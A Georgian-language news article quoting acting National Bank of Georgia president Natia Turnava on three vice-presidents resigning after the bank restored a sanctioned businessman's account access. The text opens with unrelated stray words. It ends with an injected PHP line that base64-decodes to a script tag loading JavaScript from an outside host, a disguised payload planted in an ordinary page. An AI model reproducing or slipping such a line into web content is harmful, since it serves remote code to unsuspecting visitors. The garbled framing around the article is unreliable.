celsiusi
ავერსი შნაიდერი

მათ შეეძლოთ, რომ ეროვნული ბანკი, როგორც ინსტიტუცია, რომელსაც ისინი, სანამ ნათია თურნავა მოვიდოდა, წლები ემსახურებოდნენ, საკმაოდ რთულ მდგომარეობაში ჩაეგდოთ და ძალიან კარგი, რომ ეს ასე არ მოხდა და ძალიან კარგი, რომ ჩვენ ორი ახალი წევრი გვყავს და საბჭოს იურიდიული ქმედით უნარიანობა კითხვის ნიშნის ქვეშ არ დადგა", - განაცხადა სებ-ის პრეზიდენტის მოვალეობის შემსრულებელმა ნათია თურნავამ გადაცემა "ბიზნესის კვირეულში" სტუმრობისას.

თურნავა აღნიშნავს იმასაც, რომ მომავალი ორი თვის განმავლობაში, როცა კანონის შესაბამისად, საბჭოს ყოფილი წევრები კვლავ ეროვნული ბანკის თანამშრომლებად რჩებიან, სურვილის შემთხვევაში მათ გადაწყვეტილებების მიღებაში მონაწილეობა შეეძლებთ. 

"ისინი ფორმალურად რჩებიან საბჭოში. თუ სურვილი ექნებათ მიიღონ მონაწილეობა [საბჭოს მუშაობაში] მე ამას ვერც ავუკრძალავ და ვერც დავავალდებულებ. უბრალოდ იმ განცხადების შემდგომ ალბათ ცოტა უხერხული შეიძლება იყოს, თუმცა არ შევდივარ ამის განსჯაში", - ამბობს თურნავა. 

შეგახსენებთ, რომ 19 სექტემბერს, ეროვნულმა ბანკმა საგამონაკლისო წესით აშშ-ის მიერ სანქცირებულ ოთარ ფარცხალაძეს საბანკო ანგარიშებზე წვდომა აღუდგინა, რაც გახდა საფუძველი სებ-ის საბჭო სამივე ვიცე-პრეზიდენტის - ნიკოლოზ გაგუა, არჩილ მესტვირიშვილი და პაპუნა ლეჟავა თანამდებობიდან გადამდგარიყო. 

1289
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");